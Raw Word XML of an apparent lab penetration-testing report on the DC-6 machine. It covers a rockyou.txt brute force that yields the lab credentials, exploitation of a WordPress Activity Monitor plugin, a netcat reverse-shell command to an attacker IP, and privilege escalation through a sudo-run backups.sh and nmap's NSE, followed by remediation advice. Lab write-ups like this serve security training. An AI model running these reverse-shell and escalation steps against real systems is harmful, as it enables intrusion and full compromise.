            <w:r w:rsidR="00D40C85" w:rsidRPr="00191911">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">rockyou.txt </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14DDD250" w14:textId="77777777" w:rsidR="00D40C85" w:rsidRDefault="00D40C85">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="71958FFE" w14:textId="6C393F4E" w:rsidR="00D40C85" w:rsidRDefault="00191911">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00191911">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B3E91BD" wp14:editId="261964AE">
                  <wp:extent cx="4648200" cy="2840990"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1549961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9615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84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55335" w14:textId="77777777" w:rsidR="00D40C85" w:rsidRDefault="00D40C85">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7EB51FFC" w14:textId="496DA8E6" w:rsidR="00191911" w:rsidRDefault="00191911" w:rsidP="0019191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Found valid creds ( </w:t>
            </w:r>
            <w:r w:rsidRPr="00191911">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">mark : helpdesk01  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3832B0C3" w14:textId="77777777" w:rsidR="00191911" w:rsidRDefault="00191911" w:rsidP="00191911">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6ABD790B" w14:textId="43BF2E46" w:rsidR="00191911" w:rsidRPr="00191911" w:rsidRDefault="00191911" w:rsidP="00191911">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00191911">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="185F1EA8" wp14:editId="5166FB4E">
                  <wp:extent cx="4648200" cy="959485"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="161508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0867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2DA1F" w14:textId="77777777" w:rsidR="00191911" w:rsidRDefault="00191911">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="56E85C32" w14:textId="41756008" w:rsidR="00191911" w:rsidRDefault="00191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7 – Now let’s try to login and enumerate further </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61EBB6E6" w14:textId="77777777" w:rsidR="00191911" w:rsidRDefault="00191911">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2FBE47F6" w14:textId="224940C6" w:rsidR="00191911" w:rsidRDefault="00191911">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00191911">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F46A001" wp14:editId="178A68AD">
                  <wp:extent cx="4679950" cy="3051175"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="0"/>
                  <wp:docPr id="207116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1670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05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DD4F1" w14:textId="77777777" w:rsidR="00191911" w:rsidRDefault="00191911">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5FCC2BDB" w14:textId="10C01A7C" w:rsidR="00191911" w:rsidRDefault="00191911" w:rsidP="0019191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Valid Login </w:t>
            </w:r>
            <w:r w:rsidR="009D4F25">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">and found one plugin Activity Monitor </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A31987A" w14:textId="77777777" w:rsidR="009D4F25" w:rsidRDefault="009D4F25" w:rsidP="009D4F25">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="71BAFD40" w14:textId="2FE24F8F" w:rsidR="009D4F25" w:rsidRDefault="009D4F25" w:rsidP="009D4F25">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009D4F25">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1812EC8E" wp14:editId="2EAEF16E">
                  <wp:extent cx="4679950" cy="1810385"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="0"/>
                  <wp:docPr id="867534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5347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228CC" w14:textId="77777777" w:rsidR="009D4F25" w:rsidRDefault="009D4F25" w:rsidP="009D4F25">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="45CD8A61" w14:textId="78E54878" w:rsidR="009D4F25" w:rsidRDefault="009D4F25" w:rsidP="009D4F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8 – Let’s find if there is any exploit available </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62DF20C2" w14:textId="77777777" w:rsidR="009D4F25" w:rsidRDefault="009D4F25" w:rsidP="009D4F25">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="70EEF148" w14:textId="4DA06682" w:rsidR="009D4F25" w:rsidRDefault="009D4F25" w:rsidP="009D4F25">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009D4F25">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D896BC2" wp14:editId="39903D81">
                  <wp:extent cx="4648200" cy="1217295"/>
                  <wp:effectExtent l="0" t="0" r="0" b="1905"/>
                  <wp:docPr id="1503722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220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C34BC" w14:textId="77777777" w:rsidR="009D4F25" w:rsidRDefault="009D4F25" w:rsidP="009D4F25">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4BCABE6A" w14:textId="4FD5FC47" w:rsidR="009D4F25" w:rsidRDefault="009D4F25" w:rsidP="009D4F2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 we do have Exploit and also we have valid user lets configure exploit </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BEE8D2D" w14:textId="77777777" w:rsidR="009D4F25" w:rsidRDefault="009D4F25" w:rsidP="009D4F25">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6C22035E" w14:textId="6005586E" w:rsidR="00A56963" w:rsidRDefault="00A56963" w:rsidP="009D4F25">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A56963">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="481E5D29" wp14:editId="4FADCD3E">
                  <wp:extent cx="4654550" cy="1939290"/>
                  <wp:effectExtent l="0" t="0" r="0" b="3810"/>
                  <wp:docPr id="543824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241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93FA3" w14:textId="77777777" w:rsidR="009D4F25" w:rsidRDefault="009D4F25" w:rsidP="009D4F25">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0D8F12FF" w14:textId="12502BFE" w:rsidR="00A56963" w:rsidRPr="00A56963" w:rsidRDefault="00A56963" w:rsidP="00A5696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Login on it as </w:t>
            </w:r>
            <w:r w:rsidRPr="00A56963">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>www-data</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C84E2AE" w14:textId="4CDF7036" w:rsidR="00A56963" w:rsidRDefault="00A56963" w:rsidP="00A5696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Lets get reverse shell on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97971EC" w14:textId="02EE9B34" w:rsidR="00A56963" w:rsidRDefault="00A56963" w:rsidP="00A5696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 w:rsidRPr="00A56963">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>nc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A56963">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> 10.255.112.101 4444 -e /bin/bash</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FE6886E" w14:textId="77777777" w:rsidR="00A56963" w:rsidRDefault="00A56963" w:rsidP="00A56963">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2D2F8B87" w14:textId="3C5E1ED2" w:rsidR="00A56963" w:rsidRDefault="004001E8" w:rsidP="00A56963">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004001E8">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01D129AC" wp14:editId="5FD57BEF">
                  <wp:extent cx="4654550" cy="1955165"/>
                  <wp:effectExtent l="0" t="0" r="0" b="6985"/>
                  <wp:docPr id="1004655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6555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195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A5D77" w14:textId="71F10C98" w:rsidR="004001E8" w:rsidRDefault="004001E8" w:rsidP="004001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Shell </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54A1FEBF" w14:textId="77777777" w:rsidR="004001E8" w:rsidRPr="004001E8" w:rsidRDefault="004001E8" w:rsidP="004001E8">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2371DE43" w14:textId="600178F3" w:rsidR="004001E8" w:rsidRPr="004001E8" w:rsidRDefault="004001E8" w:rsidP="004001E8">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004001E8">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3389E961" wp14:editId="44852B3E">
                  <wp:extent cx="4699000" cy="1279525"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="0"/>
                  <wp:docPr id="4850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56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12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0BF00" w14:textId="77777777" w:rsidR="00A56963" w:rsidRDefault="00A56963" w:rsidP="00A56963">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3CAFDD2F" w14:textId="77777777" w:rsidR="00142A5A" w:rsidRDefault="00142A5A" w:rsidP="00A569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9 – Escalating Privilege Escalation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42FB2D24" w14:textId="77777777" w:rsidR="00142A5A" w:rsidRDefault="00142A5A" w:rsidP="00A56963">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7AA88F60" w14:textId="6492AE21" w:rsidR="004001E8" w:rsidRDefault="00142A5A" w:rsidP="00A56963">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00142A5A">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A2F14DB" wp14:editId="70C8F583">
                  <wp:extent cx="4641850" cy="3265170"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="0"/>
                  <wp:docPr id="1231386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38663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326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14:paraId="7774A547" w14:textId="77777777" w:rsidR="00142A5A" w:rsidRPr="00A56963" w:rsidRDefault="00142A5A" w:rsidP="00A56963">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="086B681C" w14:textId="0A1E134E" w:rsidR="00191911" w:rsidRDefault="00142A5A" w:rsidP="00142A5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can run this thing backups.sh </w:t>
            </w:r>
            <w:r w:rsidR="003D09BB">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">without pass </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6531919E" w14:textId="77777777" w:rsidR="00142A5A" w:rsidRDefault="00142A5A" w:rsidP="00142A5A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="62ABD2C3" w14:textId="77777777" w:rsidR="00142A5A" w:rsidRDefault="00142A5A" w:rsidP="00142A5A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00142A5A">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04E4E9B1" wp14:editId="45CCEBE0">
                  <wp:extent cx="4686300" cy="1359535"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="827080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08006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0E30C" w14:textId="77777777" w:rsidR="003D09BB" w:rsidRDefault="003D09BB" w:rsidP="00142A5A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="440A64E3" w14:textId="1CDDE372" w:rsidR="003D09BB" w:rsidRDefault="003D09BB" w:rsidP="003D09B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Lets try to abuse that script  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37FAA573" w14:textId="77777777" w:rsidR="003D09BB" w:rsidRDefault="003D09BB" w:rsidP="003D09BB">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1042574B" w14:textId="15959A16" w:rsidR="003D09BB" w:rsidRPr="003D09BB" w:rsidRDefault="003D09BB" w:rsidP="003D09BB">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D09BB">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2744E974" wp14:editId="1C083966">
                  <wp:extent cx="4641850" cy="1289050"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
                  <wp:docPr id="202336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360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E8A5D" w14:textId="77777777" w:rsidR="003D09BB" w:rsidRDefault="003D09BB" w:rsidP="003D09BB">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3B98CDE6" w14:textId="53151FEB" w:rsidR="003D09BB" w:rsidRDefault="003D09BB" w:rsidP="003D09B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appended it successfully lets try to run the script </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11C8D5F5" w14:textId="77777777" w:rsidR="003D09BB" w:rsidRDefault="003D09BB" w:rsidP="003D09BB">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="77F78A1B" w14:textId="0A7CA89D" w:rsidR="003D09BB" w:rsidRDefault="003D09BB" w:rsidP="003D09BB">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D09BB">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B5D3B51" wp14:editId="5B23652B">
                  <wp:extent cx="4762500" cy="1664970"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1692358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35893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C0D47" w14:textId="77777777" w:rsidR="003D09BB" w:rsidRPr="003D09BB" w:rsidRDefault="003D09BB" w:rsidP="003D09BB">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3B35BEC5" w14:textId="7F2478F5" w:rsidR="003D09BB" w:rsidRDefault="003D09BB" w:rsidP="003D09B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login </w:t>
            </w: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try </w:t>
            </w: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 -l</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23FBC7DA" w14:textId="77777777" w:rsidR="003D09BB" w:rsidRDefault="003D09BB" w:rsidP="003D09BB">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="52F3BBC5" w14:textId="3A40E900" w:rsidR="003D09BB" w:rsidRPr="003D09BB" w:rsidRDefault="003D09BB" w:rsidP="003D09BB">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D09BB">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67377A0B" wp14:editId="0AE3DC1C">
                  <wp:extent cx="4692650" cy="1393190"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="26244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4357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BAC51" w14:textId="77777777" w:rsidR="003D09BB" w:rsidRDefault="003D09BB" w:rsidP="003D09BB">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5B0E76DB" w14:textId="531F10ED" w:rsidR="003D09BB" w:rsidRDefault="003D09BB" w:rsidP="003D09B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Jens can run </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> as root which does not requires password </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A7990BB" w14:textId="77777777" w:rsidR="003D09BB" w:rsidRDefault="003D09BB" w:rsidP="003D09BB">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="618832EF" w14:textId="697C4BA1" w:rsidR="003D09BB" w:rsidRPr="003D09BB" w:rsidRDefault="00F218E6" w:rsidP="003D09BB">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F218E6">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="606E4E4E" wp14:editId="56D89699">
                  <wp:extent cx="4692650" cy="1383030"/>
                  <wp:effectExtent l="0" t="0" r="0" b="7620"/>
                  <wp:docPr id="2061458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45889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654CC" w14:textId="77777777" w:rsidR="003D09BB" w:rsidRDefault="003D09BB" w:rsidP="003D09BB">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="49ED5553" w14:textId="5CFF96D3" w:rsidR="00F218E6" w:rsidRPr="00F218E6" w:rsidRDefault="00F218E6" w:rsidP="00F218E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Root by running NSE script which was crafted by me. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09288D9D" w14:textId="6EACEC26" w:rsidR="003D09BB" w:rsidRPr="003D09BB" w:rsidRDefault="003D09BB" w:rsidP="003D09BB">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00142A5A" w14:paraId="1AD99B8A" w14:textId="77777777" w:rsidTr="004001E8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1444" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E583769" w14:textId="0DD7A8F7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7572" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66B443CF" w14:textId="7F70E10E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remote code execution enabling arbitrary commands.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C9A46E6" w14:textId="18904712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credential disclosure allowing authenticated access.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="359EB235" w14:textId="7F6F6F34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local privilege escalation leading to root.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24276E20" w14:textId="0A0F9210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full system compromise and persistent backdoor potential.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69527183" w14:textId="77777777" w:rsidR="007433B8" w:rsidRPr="007433B8" w:rsidRDefault="007433B8">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00142A5A" w14:paraId="3F90AFFC" w14:textId="77777777" w:rsidTr="004001E8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1444" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32B0B975" w14:textId="0F6E4E8E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>Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7572" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A2B44E5" w14:textId="24A81891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restrict and harden exposed services.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78FEEF5D" w14:textId="6139278A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validate and sanitize all user input.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6731AB62" w14:textId="4B230EC2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remove plaintext credentials from disk and rotate secrets.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7788BE51" w14:textId="24897BF7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>remove unnecessary SUID binaries.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53FA22F5" w14:textId="78748DD2" w:rsidR="00AE064F" w:rsidRPr="00AE064F" w:rsidRDefault="00AE064F" w:rsidP="00AE064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E064F">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">tighten </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AE064F">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>sudoers</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AE064F">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> to least privilege and apply security updates.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40C77999" w14:textId="77777777" w:rsidR="007433B8" w:rsidRPr="007433B8" w:rsidRDefault="007433B8">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00142A5A" w14:paraId="0BD25286" w14:textId="77777777" w:rsidTr="004001E8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1444" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60BD480C" w14:textId="2E90EBB8" w:rsidR="007433B8" w:rsidRPr="007433B8" w:rsidRDefault="007433B8">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007433B8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7572" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66D99DE8" w14:textId="4AB78C9C" w:rsidR="007433B8" w:rsidRDefault="00AE064F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId32" w:history="1">
              <w:r w:rsidRPr="0064029B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>https://wpscan.com/plugin/wp-security-audit-log/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="5881EF9E" w14:textId="25843B15" w:rsidR="00AE064F" w:rsidRPr="007433B8" w:rsidRDefault="00AE064F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="484EBC22" w14:textId="77777777" w:rsidR="00F168F1" w:rsidRDefault="00F168F1"/>
    <w:sectPr w:rsidR="00F168F1">
      <w:headerReference w:type="default" r:id="rId33"/>
      <w:foot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C101C" w14:textId="77777777" w:rsidR="00924F9E" w:rsidRDefault="00924F9E" w:rsidP="007433B8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="22E87C84" w14:textId="77777777" w:rsidR="00924F9E" w:rsidRDefault="00924F9E" w:rsidP="0074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7433B8" w14:paraId="21031E84" w14:textId="77777777">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="2500" w:type="pct"/>
          <w:shd w:val="clear" w:color="auto" w:fill="4472C4" w:themeFill="accent1"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="5C5FD0AA" w14:textId="58FF8762" w:rsidR="007433B8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EB0B739C959491EAE01D79E1AEB435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D4347">
                <w:rPr>
                  <w:caps/>
                  <w:color w:val="FFFFFF" w:themeColor="background1"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="18"/>
                </w:rPr>
                <w:t>Penetration Testing Report DC – 6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983AE1C90AC64D07AE1F9D7A842DC11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2D503E4" w14:textId="72064902" w:rsidR="007433B8" w:rsidRDefault="007433B8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6135659B" w14:textId="77777777" w:rsidR="007433B8" w:rsidRDefault="00743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38F00" w14:textId="77777777" w:rsidR="00924F9E" w:rsidRDefault="00924F9E" w:rsidP="007433B8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
